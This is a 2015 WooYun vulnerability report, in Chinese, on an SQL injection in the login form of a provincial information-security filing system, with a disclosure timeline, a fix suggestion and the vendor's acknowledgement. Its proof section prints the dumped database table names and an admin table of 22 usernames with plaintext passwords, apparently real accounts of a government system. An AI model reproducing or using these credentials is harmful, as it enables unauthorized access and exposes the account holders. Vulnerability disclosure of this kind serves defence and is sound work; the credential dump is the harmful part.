漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0136600
漏洞标题:某省信息安全等级保护备案系统注入sec(政府/学校/公司信息泄露)
相关厂商:某省信息安全等级保护备案系统
漏洞作者: 小天
提交时间:2015-08-24 19:08
修复时间:2015-10-12 14:54
公开时间:2015-10-12 14:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(公安部一所)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-24: 细节已通知厂商并且等待厂商处理中
2015-08-28: 厂商已经确认,细节仅向厂商公开
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开
简要描述:
rt
详细说明:
我能说,,
http://**.**.**.**/bugs/wooyun-2015-0116307
原来的这个漏洞还没修复吗,
这个漏洞是admin登录测试的,,
我回看了一下,,user登录也存在这个漏洞,,
就在主页上,
http://**.**.**.**/
左侧有个登录,
漏洞证明:
直接上code
在username和password处,
都存在未过滤,,
上图,,
数据库爆出来了
Database: wjzd
[11 tables]
+-----------+
| ghlyfdb |
| hlyfdb |
| jdjc |
| jfba |
| jfbajdjc |
| jffaaqb |
| jfjgysb |
| jfwsyy |
| userinfo |
| yjp_admin |
| zddwba |
+-----------+
Database: wjzd
Table: yjp_admin
[22 entries]
+----+-------+-------------+----------------+
| id | levle | yjp_admin | yjp_password |
+----+-------+-------------+----------------+
| 15 | 1 | 黑龙江安衡讯 | **.**.**.** |
| 20 | 1 | luxinkai | lxk010558 |
| 22 | 2 | songbei | songbei123 |
| 23 | 3 | daoli | daoli123 |
| 24 | 4 | nangang | nangang123 |
| 25 | 5 | daowai | daowai123 |
| 26 | 6 | xiangfang | xiangfang123 |
| 28 | 8 | hulan | hulan123 |
| 29 | 9 | acheng | acheng123 |
| 30 | 10 | shuangcheng | shuangcheng123 |
| 31 | 11 | wuchang | wuchang123 |
| 32 | 12 | shangzhi | szwadd |
| 33 | 13 | fangzheng | fangzheng123 |
| 34 | 14 | yilan | yilan123 |
| 35 | 15 | binxian | binxian123 |
| 36 | 16 | bayan | bayan123 |
| 37 | 17 | mulan | mulan123 |
| 38 | 18 | tonghe | tonghe123 |
| 39 | 19 | yanshou | yanshou123 |
| 40 | 7 | pingfang | pingfang123 |
| 41 | 1 | panql | 008800 |
| 42 | 1 | liuda | 721226 |
+----+-------+-------------+----------------+
余下的数据参照哦:
http://**.**.**.**/bugs/wooyun-2015-0116307这个吧
修复方案:
参数过滤
版权声明:转载请注明来源 小天@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2015-08-28 14:54
厂商回复:
感谢提交!!
已通知其修复。
最新状态:
暂无